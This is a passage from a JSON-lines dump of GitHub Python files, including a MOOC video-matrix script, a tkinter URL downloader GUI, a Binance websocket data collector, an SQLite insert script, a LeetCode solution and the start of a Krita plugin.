wk7 + wk8 + wk9 + wk10\nuser_watched_video = {} ## a dictionary for the video each user watched\nevent_type = ['play_video','stop_video','pause_video','seek_video']\nwith open(fileName,'r') as csvfile :\n lines = csv.reader(csvfile, delimiter = ',', quotechar = '\"')\n for line in lines : \n if line[0] in event_type : \n if line[13] not in user_watched_video:\n user_watched_video[line[13]] = []\n if line[9] not in user_watched_video[line[13]]:\n user_watched_video[line[13]].append(line[9])\n\n## Sorted videos in chronological order \n# sorted_video_name = sorted(video_names, key=lambda video: float(re.search('(?<=Unit)\\s\\d+\\.\\d+',video).group(0)))\n#sorted_video_name = video_names\n## Create a matrix of user - video watched relation \n## 1 = user watched this video\n## 0 = user didn't watch this video\noutputName = 'HumanitiesSciences_StatLearning_Winter2016_UserVideo_Matrix.csv'\noutputFile = open(outputName, 'w')\ncolumnNames = 'UserName,'\nfor video in videos:\n columnNames += (video + ',')\ncolumnNames = columnNames[:-1] + '\\n'\noutputFile.write(columnNames)\nfor user in user_watched_video.keys():\n newLine = user + ','\n for video in videos:\n if video in user_watched_video[user]:\n newLine += '1,'\n else:\n newLine += '0,'\n newLine = newLine[:-1] + '\\n'\n outputFile.write(newLine)","repo_name":"sijunhe/DataMiningMOOC","sub_path":"countVideos/countVideo_StatsLearn.py","file_name":"countVideo_StatsLearn.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"12911431904","text":"import logging\n\nfrom rich.logging import RichHandler\n\nfrom .defines import HeartTask, get_class_names\nfrom .defines import HKResult\n\n\ndef hkresult_to_str(result: HKResult) -> str:\n \"\"\"Format HKResult into string for printing\"\"\"\n rhythym_names = get_class_names(HeartTask.hrv)\n num_beats = result.num_norm_beats + result.num_pac_beats + result.num_pvc_beats\n rhythm = \"ARRHYTHMIA\" if result.arrhythmia else rhythym_names[result.heart_rhythm]\n return (\n \"--------------------------\\n\"\n \"**** HeartKit Results ****\\n\"\n \"--------------------------\\n\"\n f\" Heart Rate: {result.heart_rate}\\n\"\n f\"Heart Rhythm: {rhythm}\\n\"\n f\" Total Beats: {num_beats}\\n\"\n f\" Norm Beats: {result.num_norm_beats}\\n\"\n f\" PAC Beats: {result.num_pac_beats}\\n\"\n f\" PVC Beats: {result.num_pvc_beats}\\n\"\n f\" Arrhythmia: {'Detected' if result.arrhythmia else 'Not Detected'}\\n\"\n )\n\ndef setup_logger(log_name: str) -> logging.Logger:\n \"\"\"Setup logger with Rich\n\n Args:\n log_name (str): _description_\n\n Returns:\n logging.Logger: _description_\n \"\"\"\n logger = logging.getLogger(log_name)\n if logger.handlers:\n return logger\n logging.basicConfig(level=logging.ERROR, force=True, handlers=[RichHandler()])\n logger.propagate = False\n logger.setLevel(logging.INFO)\n logger.handlers = [RichHandler()]\n return logger\n","repo_name":"AmbiqAI/heartkit-demo","sub_path":"python/heartkit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"36427750761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nparentHansard\n\"\"\"\n\nimport datetime\n\nclass hansardFormatting:\n '''establishes HansardFormatting type event class'''\n \n def __init__(self):\n self.FormattingID = int()\n self.FormattingType = str()\n self.FormattingText = str()\n \nclass hansardProcedural:\n '''establishes HansardProcedural type event class'''\n \n def __init__(self):\n self.ProceduralID = int()\n self.ProceduralType = str()\n self.ProceduralText = str()\n \nclass hansardStatement:\n '''establishes HansardStatement type event class'''\n \n def __init__(self):\n self.StatementID = int()\n self.StatementOwnerID = int()\n self.StatementText = str()\n\nclass hansardEvent:\n '''establishes generic Hansard event class'''\n \n def __init__(self):\n self.HansardEventID = int()\n self.HansardObjectID = int()\n self.HansardEventType = str()\n self.HansardEventContent = ()\n \nclass HansardObject:\n '''establishes generic Hansard object (Hansard Day) class'''\n \n def __init__(self):\n self.HansardObjectID = int()\n self.HansardDate = datetime.date()\n self.ParlSessID = int()\n \nclass ParlSess:\n '''establishes ParlSess class'''\n \n def __init__(self):\n self.ParlSessID = int()\n self.ParliamentCount = int()\n self.ParliamentStartDate = datetime.date()\n self.ParliamentEndDate = datetime.date()\n self.ParliamentElectionDate = datetime.date()\n self.ParliamentTotalSessions = int()\n self.PartyGovernment = str()\n self.PartyOpposition = str()\n self.GovernmentType = str()\n self.GovernmentSeatsFrac = float()\n self.NumberOfficialParties = int() \n self.ParliamentSession = int()\n self.ParliamentSessionSittingDays = int()\n self.ParliamentSessionStartDate = datetime.date()\n self.ParliamentSessionEndDate = datetime.date()\n \n \n \n \n \n \n \n \n ","repo_name":"twhyte/newHansard","sub_path":"parentHansard.py","file_name":"parentHansard.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"54170637","text":"# This is a sample Python script.\n\nimport librosa\nfrom Array_of_features_create import return_features_array\naudio_data = 'Violet.mp3'\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n\ndef main():\n\n # src = \"forest floor.mp3\"\n # dst = \"forest floor.wav\"\n #\n # # convert wav to mp3\n # sound = AudioSegment.from_mp3(src)\n # sound.export(dst, format=\"wav\")\n #\n print(\"Start Openning\")\n x, sr = librosa.load(audio_data)\n print(\"End Openning\")\n arr = return_features_array(x, sr)\n print(arr)\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n main()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"cary-cyon/for_recomending_system_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"18697420162","text":"import tkinter as tk\r\nfrom tkinter import filedialog, messagebox, simpledialog\r\nimport tkinter.ttk as ttk\r\nfrom tkinter.ttk import Separator\r\nimport urllib.request\r\nimport os\r\nimport webbrowser\r\nfrom PIL import Image, ImageTk\r\n\r\n# Create the main window\r\nwindow = tk.Tk()\r\nwindow.title(\"Wget Downloader\")\r\nwindow.iconbitmap(\"G:\\Software\\py\\Python Creations\\Completed\\Projects\\Wget Downloader\\Version 1.2\\wget logo 1.ico\") # Set the path to your icon file\r\n\r\n# Add an image label at the top center\r\n# Replace with the actual path to your image file\r\nimage_path = \"G:\\Software\\py\\Python Creations\\Completed\\Projects\\Wget Downloader\\Images\\wget cover 1.png\"\r\nimage = Image.open(image_path)\r\n# Replace width and height with your desired dimensions\r\nimage = image.resize((130, 120))\r\nimage = ImageTk.PhotoImage(image)\r\nimage_label = tk.Label(window, image=image)\r\nimage_label.pack(pady=(15, 0))\r\n\r\n# Function to handle the \"Paste URL\" button\r\n\r\n\r\ndef paste_url():\r\n url_entry.delete(0, tk.END)\r\n url_entry.insert(tk.END, window.clipboard_get())\r\n\r\n\r\n# Function to handle the browse button\r\n\r\n\r\ndef select_output_dir():\r\n output_dir = filedialog.askdirectory()\r\n output_dir_entry.delete(0, tk.END)\r\n output_dir_entry.insert(tk.END, output_dir)\r\n # Set the current working directory to the selected output directory\r\n os.chdir(output_dir)\r\n\r\n\r\n# Function to handle the download process\r\n\r\n\r\ndef download_file():\r\n url = url_entry.get()\r\n output_dir = output_dir_entry.get()\r\n if url:\r\n try:\r\n file_name = os.path.basename(url)\r\n file_path = os.path.join(output_dir, file_name)\r\n # Disable the download button during the download\r\n download_button.config(state=tk.DISABLED)\r\n status_widget.update_status(\"Downloading...\")\r\n urllib.request.urlretrieve(url, file_path, reporthook=download_progress)\r\n update_status(\"Download completed.\")\r\n show_completion_popup()\r\n except Exception as e:\r\n update_status(\"Error occurred during download: \" + str(e))\r\n finally:\r\n # Enable the download button after the download\r\n download_button.config(state=tk.NORMAL)\r\n status_widget.update_status(\"Ready\")\r\n else:\r\n update_status(\"Please enter a valid URL.\")\r\n\r\n\r\n# Callback function to update the download progress\r\n\r\n\r\ndef download_progress(count, block_size, total_size):\r\n percentage = int(count * block_size * 100 / total_size)\r\n status_widget.update_progress(percentage)\r\n window.update()\r\n\r\n\r\n# Function to update the status label\r\n\r\n\r\ndef update_status(text):\r\n status_widget.update_status(text)\r\n\r\n\r\n# Function to display a pop-up window for completion status\r\n\r\n\r\ndef show_completion_popup():\r\n messagebox.showinfo(\r\n \"Download Complete\", \"The download has been completed successfully.\"\r\n )\r\n\r\n\r\n# Function to handle the \"About\" menu item\r\n\r\n\r\ndef show_about():\r\n messagebox.showinfo(\r\n \"About\", \"Wget Downloader\\nVersion 1.2\\n\\nCreated by pudsz\\n\\n... TTIOT ...\"\r\n )\r\n\r\n\r\n# Function to handle the \"How to use\" menu item\r\n\r\n\r\ndef show_usage():\r\n messagebox.showinfo(\r\n \"How to use\",\r\n \"1. Enter the URL of the file to download.\\n2. Select the output directory.\\n3. Click on the 'Download' button to start the download.\\n\\nNote: For detailed instructions on how to use please open the 'Help File'\",\r\n )\r\n\r\n\r\n# Function to open the help file documentation\r\n\r\n\r\ndef open_help_file():\r\n # Replace with the actual path to your help file\r\n help_file_path = r\"G:\\Software\\py\\Python Creations\\Completed\\Projects\\Wget Downloader\\Docs\\readme.txt\"\r\n webbrowser.open(help_file_path)\r\n\r\n\r\n# Function to open the release notes file documentation\r\n\r\n\r\ndef open_release_notes_file():\r\n # Replace with the actual path to your release notes file\r\n release_notes_file_path = \"G:\\Software\\py\\Python Creations\\Completed\\Projects\\Wget Downloader\\Version 1.2\\Release Notes Version 1.2.txt\"\r\n webbrowser.open(release_notes_file_path)\r\n\r\n\r\n# Function to exit the program\r\n\r\n\r\ndef exit_application():\r\n if messagebox.askokcancel(\"Exit\", \"Are you sure you want to exit?\"):\r\n window.destroy()\r\n\r\n\r\n# Function to handle the \"Check Version\" command\r\n\r\n\r\ndef check_version():\r\n messagebox.showinfo(\"Version\", \"Wget Downloader v1.2\")\r\n\r\n\r\n# Create the menu bar\r\nmenu_bar = tk.Menu(window)\r\n\r\n# Create the \"File\" menu\r\nfile_menu = tk.Menu(menu_bar, tearoff=0)\r\nfile_menu.add_command(label=\"Exit\", command=exit_application)\r\nmenu_bar.add_cascade(label=\"File\", menu=file_menu)\r\n\r\n# Create the \"Help\" menu\r\nhelp_menu = tk.Menu(menu_bar, tearoff=0)\r\nhelp_menu.add_command(label=\"How to use\", command=show_usage)\r\n# Command to open the local help file\r\nhelp_menu.add_command(label=\"Help File...\", command=open_help_file)\r\nhelp_menu.add_separator() # Add a separator\r\nhelp_menu.add_command(label=\"About\", command=show_about)\r\nmenu_bar.add_cascade(label=\"Help\", menu=help_menu)\r\n\r\n# Create the \"Version\" submenu\r\nversion_menu = tk.Menu(menu_bar, tearoff=0)\r\nmenu_bar.add_cascade(label=\"Version\", menu=version_menu)\r\nversion_menu.add_command(\r\n label=\"Check Version\", command=check_version\r\n) # Add your command here\r\nversion_menu.add_command(label=\"Release Notes...\", command=open_release_notes_file)\r\nversion_menu.add_separator() # Add a separator\r\nversion_menu.add_command(label=\"Wget Downloader\", command=None)\r\n\r\n# Add the menu bar to the window\r\nwindow.config(menu=menu_bar)\r\n\r\n# Add a label to display instructions\r\ninstructions_label = tk.Label(\r\n window,\r\n text=\"Enter the URL of the file to download:\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n)\r\ninstructions_label.pack(fill=\"both\", expand=True, pady=(10, 0))\r\n\r\n# Add an entry field for the URL\r\nurl_entry = tk.Entry(window, width=50, bg=\"#F7FCFC\")\r\nurl_entry.pack(fill=\"both\", expand=True, pady=(4, 5))\r\n\r\n# Add a \"Paste URL\" button\r\npaste_button = tk.Button(\r\n window,\r\n text=\"Paste URL\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n command=paste_url,\r\n)\r\n# Adjust the width and height as desired\r\npaste_button.config(width=9, height=0)\r\npaste_button.pack(expand=True, pady=(4, 10))\r\n\r\n# Add a separator line\r\nseparator = Separator(window, orient=tk.HORIZONTAL)\r\nseparator.pack(fill=tk.X, padx=(10))\r\n\r\n# Add a label to display the output directory\r\noutput_dir_label = tk.Label(\r\n window,\r\n text=\"Select output directory:\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n)\r\noutput_dir_label.pack(fill=\"both\", expand=True, pady=(10, 0))\r\n\r\n# Add an entry field to display the selected output directory\r\noutput_dir_entry = tk.Entry(window, width=50, bg=\"#F7FCFC\", justify=\"center\")\r\noutput_dir_entry.pack(fill=\"both\", expand=True, pady=(4, 5))\r\n\r\n# Add a button to browse and select the output directory\r\nbrowse_button = tk.Button(\r\n window,\r\n text=\"Browse\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n command=select_output_dir,\r\n)\r\n# Adjust the width and height as desired\r\nbrowse_button.config(width=9, height=0)\r\nbrowse_button.pack(expand=True, pady=(4, 10))\r\n\r\n# Add a separator line\r\nseparator = Separator(window, orient=tk.HORIZONTAL)\r\nseparator.pack(fill=tk.X, padx=(10))\r\n\r\n# Add a button to start the download\r\ndownload_button = tk.Button(\r\n window,\r\n text=\"Download\",\r\n bg=\"#8D80FF\",\r\n fg=\"#F2F7FF\",\r\n justify=\"center\",\r\n font=(\"Closeness Regular\", 19),\r\n command=download_file,\r\n)\r\n# Adjust the width and height as desired\r\ndownload_button.config(width=12, height=1)\r\ndownload_button.pack(pady=(10, 1))\r\n\r\n# Create a custom widget that combines the status label and progress bar\r\n\r\n\r\nclass StatusLabelWithProgressBar(tk.LabelFrame):\r\n def __init__(self, master=None, *args, **kwargs):\r\n super().__init__(master, *args, **kwargs)\r\n self.status_label = tk.Label(\r\n self,\r\n text=\"Ready\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n )\r\n self.status_label.pack(fill=\"both\", expand=True, pady=(4, 0))\r\n self.progress_frame = tk.Frame(self, bg=\"#E7E9EA\")\r\n self.progress_bar = ttk.Progressbar(\r\n self.progress_frame, orient=tk.HORIZONTAL, length=200, mode=\"determinate\"\r\n )\r\n self.progress_label = tk.Label(\r\n self.progress_frame, text=\"0%\", bg=\"#E7E9EA\", fg=\"#20211A\"\r\n )\r\n self.progress_label.pack(side=tk.RIGHT)\r\n self.progress_bar.pack(fill=\"both\", expand=True, pady=(0, 4))\r\n self.progress_frame.pack(fill=\"both\", expand=True)\r\n\r\n def update_status(self, text):\r\n self.status_label.config(text=text)\r\n\r\n def update_progress(self, value):\r\n self.progress_bar[\"value\"] = value\r\n self.progress_label.config(text=f\"{int(value)}%\")\r\n\r\n\r\n# Add the custom status label with progress bar\r\nstatus_widget = StatusLabelWithProgressBar(window, text=\"Status\")\r\nstatus_widget.pack(fill=\"both\", expand=True, pady=(5, 20))\r\n\r\n# Watermark label\r\nwatermark_label = tk.Label(\r\n window, text=\"pudszTTIOT\", font=(\"Corbel\", 9), bg=\"#2A292B\", fg=\"#46F953\"\r\n)\r\nwatermark_label.place(relx=1.0, rely=1.0, anchor=\"se\", x=0, y=0)\r\n\r\n# Calculate the screen width and height\r\nscreen_width = window.winfo_screenwidth()\r\nscreen_height = window.winfo_screenheight()\r\n\r\n# Calculate the window position\r\nwindow_width = window.winfo_width()\r\nwindow_height = window.winfo_height()\r\nx = screen_width // 3 - window_width // 4\r\ny = screen_height // 24 - window_height // -3\r\n\r\n# Set the window position\r\nwindow.geometry(f\"+{x}+{y}\")\r\n\r\n# Background color\r\nwindow.configure(bg=\"#80b3ff\")\r\n\r\n# Run the main event loop\r\nwindow.mainloop()\r\n","repo_name":"pudszttiot/Wget-Downloader","sub_path":"v1.2/wgetdownloaderversion1.2.py","file_name":"wgetdownloaderversion1.2.py","file_ext":"py","file_size_in_byte":9869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"75035826509","text":"import sqlite3\n\n# Conectar a la base de datos\nconn = sqlite3.connect('biblioteca.db')\ncursor = conn.cursor()\n\n# Datos de ejemplo\nlibros = [\n (\"001\", \"El señor de los anillos\", 25.99, \"disponible\"),\n (\"002\", \"Cien años de soledad\", 20.50, \"disponible\"),\n (\"003\", \"1984\", 18.75, \"disponible\"),\n (\"004\", \"Don Quijote de la Mancha\", 22.30, \"disponible\"),\n (\"005\", \"Moby Dick\", 19.99, \"disponible\"),\n (\"006\", \"Orgullo y prejuicio\", 16.45, \"disponible\"),\n (\"007\", \"Crimen y castigo\", 21.20, \"disponible\"),\n (\"008\", \"Las aventuras de Tom Sawyer\", 15.75, \"disponible\"),\n (\"009\", \"La Odisea\", 23.40, \"disponible\"),\n (\"010\", \"La metamorfosis\", 17.90, \"disponible\")\n]\n\n# Insertar los libros en la tabla\ncursor.executemany('''\n INSERT INTO Libros (Código, Título, Precio_Reposición, Estado) \n VALUES (?, ?, ?, ?)\n''', libros)\n\n# Guardar los cambios y cerrar la conexión\nconn.commit()\nconn.close()\n\nprint(\"Se han insertado los libros en la tabla Libros.\")\n","repo_name":"TUTEX11/Trabajo-Practico-Integrador","sub_path":"Scripts de creacion de la DB/librosDB.py","file_name":"librosDB.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"2376469241","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 19 12:05:51 2022\r\n\r\n@author: user\r\n\"\"\"\r\n\r\n\r\nfrom backtesting import Backtest, Strategy\r\nfrom backtesting.lib import crossover\r\nfrom binance.client import Client\r\nimport pandas as pd\r\nimport numpy as np\r\nimport json\r\nimport ta\r\nfrom backtesting.lib import crossover\r\nfrom decouple import config\r\nimport time\r\nimport orjson\r\nimport websocket\r\nimport pandas as pd\r\nfrom threading import Thread\r\nfrom datetime import datetime\r\nfrom traceback import format_exc\r\n\r\napi_key = config(\"API_KEY\") # these are testnet keys\r\nsecret_key = config(\"SECRET_KEY\") # these are testnet keys\r\n\r\n# THE WS Class Code was assisted with the help of my great frend Georgie who helped me understand \r\n# the Binance Websocket API Ingestion procedures and dictionary mappings. \r\n\r\nclass WS(Thread):\r\n def __init__(self, symbols: list, timeframes: list, use_testnet=False):\r\n '''\r\n Opens Binance WS klines stream for multiple symbols and timeframes.\r\n Valid timeframes: 1s, 1m, 3m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d, 3d, 1w, 1M\r\n Streams format: @kline_\r\n Ref: https://binance-docs.github.io/apidocs/spot/en/#kline-candlestick-streams\r\n \r\n Args:\r\n symbols: List of symbols to get data for\r\n timeframes: List of timeframes to get data in\r\n logger: Logger object, set to None to use basic print for logging\r\n use_testnet: Use testnet data\r\n \r\n Attributes:\r\n data: Dict where candles data for each symbol and timeframe is stored.\r\n Each kay of data is a symbol and the value is a dict where each key is a timeframe.\r\n Each timeframe value is a dict where keys are UNIX timestamps of the candles and\r\n values are lists of open, high, low, close, volume. The current candle is constantly updated.\r\n Example structure:\r\n {\r\n 'BTCUSDT': {\r\n '1m': {\r\n 1662556860000: [18849.36, 18855.11, 18841.22, 18849.5, 142.32401]\r\n 1662556870000: [18849.36, 18855.11, 18841.22, 18849.5, 142.32401]\r\n }\r\n }, \r\n 'ETHUSDT': {\r\n '1m': {\r\n 1662556860000: [1535.98, 1536.44, 1534.33, 1536.43, 932.4534]\r\n 1662556870000: [1535.98, 1536.44, 1534.33, 1536.43, 932.4534]\r\n }\r\n }\r\n }\r\n '''\r\n super().__init__()\r\n \r\n self.ws = None\r\n if use_testnet:\r\n self.ws_url = 'wss://testnet.binance.vision/stream?streams='\r\n else:\r\n self.ws_url = 'wss://stream.binance.com:9443/stream?streams='\r\n \r\n self.data = {}\r\n self.streams = []\r\n for symbol in symbols:\r\n self.data[symbol] = {}\r\n for timeframe in timeframes:\r\n self.ws_url += f'{symbol.lower()}@kline_{timeframe.lower()}/'\r\n self.data[symbol][timeframe] = {}\r\n self.ws_url = self.ws_url.rstrip('/')\r\n \r\n self.connected = False\r\n self.daemon = True # If set to True the thread will not block execution.\r\n \r\n def log(self, msg, level='INFO'):\r\n print(f'{datetime.now()} [{level.upper()}] {msg}')\r\n \r\n def connect(self):\r\n self.ws = websocket.WebSocketApp(\r\n url=self.ws_url,\r\n on_message=self.on_message,\r\n on_close=self.on_close,\r\n on_error=self.on_error\r\n )\r\n self.connected = True\r\n \r\n def reconnect(self):\r\n del self.ws\r\n self.ws = None\r\n self.connect\r\n \r\n def start_stream(self):\r\n self.ws.run_forever()\r\n \r\n def on_message(self, ws, msg):\r\n '''\r\n Receives a WS messages and saves the data in self.data\r\n Kline message format:\r\n {\r\n \"stream\": \"ethusdt@kline_1m\",\r\n data: {\r\n \"e\": \"kline\", // Event type\r\n \"E\": 123456789, // Event time\r\n \"s\": \"BNBBTC\", // Symbol\r\n \"k\": {\r\n \"t\": 123400000, // Kline start time\r\n \"T\": 123460000, // Kline close time\r\n \"s\": \"ETHUSDT\", // Symbol\r\n \"i\": \"1m\", // Interval\r\n \"f\": 100, // First trade ID\r\n \"L\": 200, // Last trade ID\r\n \"o\": \"0.0010\", // Open price\r\n \"c\": \"0.0020\", // Close price\r\n \"h\": \"0.0025\", // High price\r\n \"l\": \"0.0015\", // Low price\r\n \"v\": \"1000\", // Base asset volume\r\n \"n\": 100, // Number of trades\r\n \"x\": false, // Is this kline closed?\r\n \"q\": \"1.0000\", // Quote asset volume\r\n \"V\": \"500\", // Taker buy base asset volume\r\n \"Q\": \"0.500\", // Taker buy quote asset volume\r\n \"B\": \"123456\" // Ignore\r\n }\r\n }\r\n }\r\n '''\r\n msg = orjson.loads(msg)\r\n # here I'm literally just parsing the data given I have a ws stream in the proper format.\r\n if 'stream' in msg and 'kline' in msg['stream']:\r\n symbol = msg['data']['s']\r\n timeframe = msg['stream'].split('_')[1]\r\n kline = msg['data']['k']\r\n # setting the value to open, high, low, close, volume from the kline dictionary\r\n self.data[symbol][timeframe][kline['t']] = [float(kline['o']), float(kline['h']), float(kline['l']), float(kline['c']), float(kline['v'])]\r\n else:\r\n self.log(f'WS message not kline: {msg}')\r\n\r\n def on_error(self, ws, error):\r\n self.log(error)\r\n\r\n def on_close(self, msg):\r\n self.log('WS connection closing', 'WARNING')\r\n self.connected = False\r\n\r\n def get_candles(self, symbol, timeframe):\r\n if not self.data[symbol.upper()][timeframe]:\r\n return pd.DataFrame(columns=['Time','Open', 'High', 'Low', 'Close', 'Volume'])\r\n df = pd.DataFrame(self.data[symbol.upper()][timeframe]).transpose()\r\n df.columns = ['Open', 'High', 'Low', 'Close', 'Volume']\r\n df.index = pd.to_datetime(df.index, unit='ms')\r\n df['Time'] = df.index\r\n return df\r\n\r\n def run(self):\r\n while True:\r\n try:\r\n self.log('Starting stream')\r\n self.connect()\r\n self.start_stream()\r\n except:\r\n self.log(format_exc(), 'error')\r\n del self.ws\r\n self.ws = None\r\n time.sleep(1)\r\n\r\n\r\nclass BinanceData:\r\n \r\n \r\n client = Client() # historical prices. Force a decision to API TESTNET or Live\r\n \r\n \r\n @classmethod\r\n def client_live(cls, api_live, api_secret_live):\r\n \r\n \"\"\"In case you need to switch to different keys\r\n \r\n Feed your real api, and secret keys for Live Trading.\"\"\"\r\n \r\n cls.client = Client(api_live, api_secret_live)\r\n \r\n @classmethod\r\n def client_testnet(cls, api, api_secret):\r\n \"\"\"Use testnet.binance.vision\r\n \r\n us user tld = 'us' .\r\n \r\n \"\"\"\r\n cls.client = Client(api, api_secret, testnet = True) \r\n \r\n def dataprocess(self, frame):\r\n #just slicing the columns we want\r\n frame = frame.iloc[:, :6]\r\n frame.columns = ['Time', 'Open', 'High', 'Low', 'Close', 'Volume'] \r\n frame = frame.set_index('Time') \r\n frame = frame.astype(float)\r\n frame.index = pd.to_datetime(frame.index, unit = 'ms')\r\n # frame['Ticker'] = self.symbol + 'USDT'\r\n return frame\r\n\r\n # NOTE can definitely merge these data gathering functions\r\n def getdailydata(self, symbol: str, baseasset: str , start:str):\r\n \"\"\"Pulling Binance API data\r\n \r\n symbol = Ticker \r\n baseasset = base asset of choise. (USDT often)\r\n Your just need to add the symbol \r\n \r\n \"\"\"\r\n frame = pd.DataFrame(self.client.get_historical_klines(symbol + baseasset , '1d', start))\r\n return self.dataprocess(frame)\r\n\r\n def gethourdata(self, symbol:str , baseasset:str, lookback:str):\r\n \r\n \"\"\"This is a way to get hour data:\r\n \r\n symbol = ticker\r\n lookback = how long the timer period you're sampling'\r\n \"\"\"\r\n if isinstance(lookback, int): \r\n lookback = str(lookback)\r\n \r\n frame = pd.DataFrame(self.client.get_historical_klines(symbol + baseasset, '1h', lookback + 'hour ago UTC'))# YOU HAVE TO DO THIS OR ERROR\r\n return self.dataprocess(frame)\r\n \r\n def getminutedata(self, symbol:str, baseasset:str, lookback: str):\r\n \r\n if isinstance(lookback, int):\r\n lookback = str(lookback)\r\n \r\n frame = pd.DataFrame(self.client.get_historical_klines(symbol + baseasset, '1m', lookback + 'min ago UTC'))\r\n return self.dataprocess(frame)\r\n \r\n \r\n def websocket(self, symbols: list, timeframes: list, use_testnet: bool = False):\r\n \r\n \"\"\"\r\n \r\n This method creates an instance of the WS class that handles websocket data stream for multiple symbols and timeframes.\r\n Args:\r\n symbols: List of symbols to get data for, e.g. ['BTCUSDT', 'ETHUSDT']\r\n timeframes: List of timeframes to get data for, e.g. ['30m', '1h']\r\n use_testnet: If set to True the data source will be Binance Testnet\r\n \r\n Notes:\r\n 1. Websocket data is streaming, e.g. when don't get any historical data from it.\r\n 2. To get the candles dataframe use get_websocket_candles() method.\r\n 3. Call websocket only once on initialization.\r\n \"\"\"\r\n self.ws = WS(symbols=symbols, timeframes=timeframes, use_testnet=use_testnet)\r\n self.ws.start()\r\n \r\n \r\n def get_websocket_candles(self, symbol: str, timeframe: str):\r\n '''\r\n Get candles data collected by the websocket object.\r\n Returns Pandas DataFrame in the same format as getminutedata and gethourdata getdailydata methods.\r\n Args:\r\n symbol: The symbol to get data for. Must be one of the symbols passed to the websocket() method.\r\n timeframe: The timeframe to get data for. Must be one of the timeframes passed to the websocket() method.\r\n '''\r\n return self.ws.get_candles(symbol=symbol, timeframe=timeframe)\r\n\r\n\r\n# if __name__ == '__main__':\r\n # Test daily data\r\n # bin_trade = BinanceData()\r\n # bin_trade.getdailydata('BTC', 'USDT' , '2019-01-01')\r\n\r\n # Test websocket data ==> Georgi These Need now to go to BUSD\r\n # bin_trade = BinanceData()\r\n # bin_trade.websocket(symbols=['BTCBUSD', 'ETHBUSD'], timeframes=['1m'])\r\n\r\n # As the WS data collector is running on it's separate thread in parallel we can have a loop in which we periodically fetch the collected data and print it.\r\n # while True:\r\n # print(bin_trade.get_websocket_candles('BTCBUSD', '1m'))\r\n # print(bin_trade.get_websocket_candles('ETHBUSD', '1m'))\r\n # time.sleep(5)\r\n","repo_name":"brymar86/TradingStrategies","sub_path":"BinanceData.py","file_name":"BinanceData.py","file_ext":"py","file_size_in_byte":11336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"39706521908","text":"# https://leetcode.com/problems/leaf-similar-trees/?envType=study-plan-v2&envId=leetcode-75\nfrom USEFUL_CODES.LC import *\n\n\nclass Solution:\n def leafSimilar(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> bool:\n def dfs(root: TreeNode) -> str:\n if not root.left and not root.right:\n return f\"{root.val},\"\n ans = \"\"\n if root.left:\n ans += dfs(root.left)\n if root.right:\n ans += dfs(root.right)\n return ans\n\n return dfs(root1) == dfs(root2)\n\n\nS = Solution()\nt1 = create_tree([3, 5, 1, 6, 2, 9, 8, null, null, 7, 4])\nt2 = create_tree([3, 5, 1, 6, 7, 4, 2, null, null, null, null, null, null, 9, 8])\nX = S.leafSimilar(t1, t2)\nprint(X)\n","repo_name":"FAdy-200/problem_solving","sub_path":"leetcode/872.py","file_name":"872.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"32438233365","text":"import sys, math, threading\nfrom krita import *\n\nfrom PyQt5.QtCore import Qt, QThreadPool\nfrom os import path\nfrom functools import partial\nfrom types import SimpleNamespace\nfrom PyQt5.QtWidgets import (\n QPushButton,\n QStatusBar,\n QLabel,\n QLineEdit,\n QHBoxLayout,\n QVBoxLayout,\n QGroupBox,\n QWidget,\n QSpinBox,\n QFrame,\n QScrollArea\n)\nfrom .navigateWidget import NavigateWidget\nfrom .blenderLayerServer import BlenderLayerServer, BlenderRunnable\n\ninstance = Krita.instance()\n \nclass BlenderLayer(DockWidget):\n\n def __init__(self):\n super().__init__()\n \n instance.notifier().windowCreated.connect(self.createActions)\n\n self.settings = SimpleNamespace()\n self.settings.transparency = True\n self.settings.gizmos = False\n self.settings.scale = 0\n self.settings.framerateScale = 0\n self.settings.region = False\n self.settings.regionViewport = True\n self.settings.renderCurrentView = False\n self.settings.lensZoom = True\n self.settings.engine = ''\n self.settings.shading = 1\n\n self.readSettings()\n self.createdActions = False\n self.lastStatus = None\n self.blenderRunning = False\n self.connected = False\n self.server = None\n self.activeInFile = None\n self.activeDocument = None\n self.blockServerSignal = False\n self.setWindowTitle(i18n(\"Blender Layer\"))\n\n scrollContainer = QWidget()\n scroll = QScrollArea()\n scroll.setWidget(scrollContainer)\n scroll.setWidgetResizable(True)\n 